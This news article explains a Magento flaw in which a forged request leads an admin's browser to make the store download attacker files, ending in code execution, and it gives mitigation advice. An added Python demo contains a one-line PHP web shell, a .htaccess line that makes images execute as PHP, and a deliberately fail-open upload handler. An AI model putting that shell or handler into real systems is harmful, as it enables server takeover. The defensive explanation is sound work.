April 17, 2017 By Douglas Bonderud 2 min read

Sales via e-commerce platforms are rising. In fact, Forbes noted the November and December 2016 totals alone equaled more than $110 billion worldwide. But growing technological adoption has also spurred cybercriminal activity, with attackers looking for any way to crack e-commerce security measures and steal payment data.

SecurityWeek explained that one vulnerability in the popular e-commerce platform Magento could do more than draw cybercriminal interest: With effective execution, attackers could gain remote code execution and with it total control of the targeted server.

Informing the Public

DefenseCode first detected the vulnerability in November 2016 and reported it to Magento through the company's bug bounty program. Although Magento acknowledged the issue, no fix had shipped by the time of writing, and DefenseCode chose to make its findings public.

So what’s the risk? CIO said it all starts with Vimeo. A built-in Magento feature lets a store user attach a Vimeo video to an existing product, and when they do, Magento fetches the video's preview image from a remote URL. The request that triggers that fetch is normally a POST, but the endpoint accepts the same parameters over GET and performs no anti-CSRF check. That turns the feature into a cross-site request forgery (CSRF) primitive: an attacker can craft a URL that makes a logged-in user's browser instruct the store to download a file of the attacker's choosing.

Magento rejects the download because it is not a valid image, but only after the file has already been written to the server, and the rejected file is never removed. Because the storage location is predictable, the attacker can repeat the trick to plant a malicious PHP script and a .htaccess file in the same directory; the .htaccess file changes how the web server handles that directory, so the planted script is executed instead of being served as static content. The attacker needs no credentials of their own: the whole chain is triggered by convincing a user who is logged into the admin panel to visit a specially crafted web page.

The remote image retrieval function is not restricted to full administrators; even low-privilege admin-panel accounts can reach it, so any such user is a viable CSRF victim. Once the planted PHP script runs, the attacker has code execution on the web server, which means full access to the store's database and potentially control of the entire system. At the time of writing the vulnerability was unpatched and estimated to put more than 250,000 sites at risk.
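The pattern behind the flaw is easier to see in code than in prose. The following Python is an added illustration written for this page; it is neither DefenseCode's proof of concept nor Magento's code. It models a "fetch remote preview image" handler that accepts any HTTP method, carries no anti-CSRF token, names the file after the attacker-supplied URL and writes the bytes before validating them, beside a hardened version with the controls a reviewer would ask for. Every name in it is an assumption: the handler and class names, the sample URLs (video.example, attacker.example), the canned responses, and the offline fetch() stub that stands in for the HTTP client.

```python
"""Added example, not Magento's code: a minimal model of a "fetch remote preview image"
handler with the fail-open behaviour described above, beside a hardened version. Handler
names, sample URLs and the offline fetch() stub are assumptions made for illustration."""
import hmac
import os
import secrets
import tempfile
from dataclasses import dataclass, field

# Constructed stand-in for the network: URL -> bytes the "remote host" would return.
SAMPLE_REMOTE = {
    "https://video.example/preview.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,  # JPEG signature
    "https://attacker.example/shell.php": b"<?php system($_GET['c']); ?>",
    "https://attacker.example/.htaccess": b"AddType application/x-httpd-php .jpg\n",
}
IMAGE_MAGIC = {b"\xff\xd8\xff": ".jpg", b"\x89PNG\r\n\x1a\n": ".png", b"GIF8": ".gif"}


def fetch(url: str) -> bytes:  # offline replacement for an HTTP client
    return SAMPLE_REMOTE[url]


def sniff_image_ext(data: bytes):
    """Extension for a recognised image signature, or None for anything else (PHP, .htaccess ...)."""
    return next((ext for magic, ext in IMAGE_MAGIC.items() if data.startswith(magic)), None)


@dataclass
class Request:
    method: str
    params: dict
    form_key: str = ""  # anti-CSRF token carried by the request, if any


@dataclass
class Session:
    form_key: str = field(default_factory=lambda: secrets.token_urlsafe(16))


def vulnerable_fetch_preview(req: Request, media_dir: str) -> str:
    """Models the flaw: any HTTP method, no anti-CSRF token, file name taken from the
    attacker-supplied URL, bytes written before validation and kept when validation fails."""
    url = req.params["remote_image"]
    path = os.path.join(media_dir, os.path.basename(url))  # "shell.php", ".htaccess", ...
    data = fetch(url)
    with open(path, "wb") as fh:
        fh.write(data)                                     # written first ...
    if sniff_image_ext(data) is None:
        raise ValueError("Disallowed file type")           # ... rejected second, never deleted
    return path


def hardened_fetch_preview(req: Request, session: Session, media_dir: str) -> str:
    """The same feature with the controls a reviewer would ask for."""
    if req.method != "POST":                               # a link or <img> tag can only GET
        raise PermissionError("method not allowed")
    # Session-bound token, compared in constant time. Magento's form key and its
    # "Add Secret Key to URLs" option play this role for admin requests.
    if not hmac.compare_digest(req.form_key.encode(), session.form_key.encode()):
        raise PermissionError("invalid form key")
    data = fetch(req.params["remote_image"])
    ext = sniff_image_ext(data)                            # validate before touching disk
    if ext is None:
        raise ValueError("Disallowed file type")
    # Server-chosen name and extension: nothing from the URL, so no .php and no dotfiles.
    fd, path = tempfile.mkstemp(prefix="preview_", suffix=ext, dir=media_dir)
    try:
        with os.fdopen(fd, "wb") as fh:
            fh.write(data)
    except Exception:
        os.unlink(path)                                    # never leave a partial file behind
        raise
    return path


def demo() -> dict:
    """Drive both handlers with constructed requests and report what each left on disk."""
    out, session = {}, Session()
    php, jpg = "https://attacker.example/shell.php", "https://video.example/preview.jpg"
    with tempfile.TemporaryDirectory() as media:
        for url in (php, "https://attacker.example/.htaccess"):
            try:
                vulnerable_fetch_preview(Request("GET", {"remote_image": url}), media)
            except ValueError:
                pass                                       # "rejected", yet the bytes remain
        out["vulnerable_leftovers"] = sorted(os.listdir(media))
    attempts = {
        "get_forged": Request("GET", {"remote_image": php}),
        "post_no_token": Request("POST", {"remote_image": php}),
        "post_php_with_token": Request("POST", {"remote_image": php}, session.form_key),
        "post_jpeg_with_token": Request("POST", {"remote_image": jpg}, session.form_key),
    }
    with tempfile.TemporaryDirectory() as media:
        for label, req in attempts.items():
            try:
                out[label] = "accepted:" + os.path.splitext(hardened_fetch_preview(req, session, media))[1]
            except (PermissionError, ValueError) as exc:
                out[label] = "rejected:" + str(exc)
        out["hardened_leftovers"] = [os.path.splitext(n)[1] for n in os.listdir(media)]
    return out


if __name__ == "__main__":
    print(demo())
```

Running demo() shows the vulnerable handler reporting "Disallowed file type" while shell.php and .htaccess sit in the media directory, which is exactly the fail-open behaviour that lets the exploit chain continue; the hardened handler refuses the GET, the token-less POST and the PHP download, and the only thing it leaves behind is a server-named .jpg. The web server side of the defense is independent of this code: on Apache, AllowOverride None for the media directories stops an uploaded .htaccess from taking effect even if a file does slip through.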

Safeguarding Against the Vulnerability

So how do companies increase the security of their e-commerce sites? Ideally a fix for the Magento issue arrives soon and shuts down this particular avenue of attack. But the value of e-commerce data means cybercriminals are constantly looking for new ways to bypass defenses or to turn seemingly innocuous functions, such as fetching a video thumbnail, into a path to complete control.

Multichannel Merchant explained that companies should proceed with caution and treat all traffic heading to their website as potentially malicious. In practice that means serving the site over TLS (HTTPS) so legitimate transactions are encrypted, properly validating and sanitizing incoming data, and running active monitoring that can detect emerging threats such as fileless ransomware and cross-platform malware.

The Magento problem also highlights the ongoing challenge of user impact in retail IT security: The code flaw makes it possible to plant malicious files, but the attack still depends on a user action, namely an admin-panel user visiting the attacker's page while logged in. Businesses should therefore restrict administrative access to the bare minimum number of accounts; fewer privileged users means fewer viable CSRF targets and a smaller set of sessions to monitor.

It’s also a good idea to remind users of the risk regularly. For anyone holding admin-panel permissions, simply visiting a compromised or attacker-controlled website while logged in may be enough to jeopardize e-commerce data.

The newly public Magento flaw poses a serious risk for e-commerce stores. With no fix available, the researchers recommended that administrators both enable Magento's “Add Secret Key to URLs” option, which appends a session-bound secret to admin URLs so that a forged request cannot be constructed in advance, and disallow .htaccess files in the affected directories (on Apache, AllowOverride None for the media directories), so that an uploaded .htaccess cannot make a planted script executable. It’s not a perfect solution, but with billions in revenue on the line and attackers drawn to any weakness, it’s worth repelling them wherever and whenever possible.
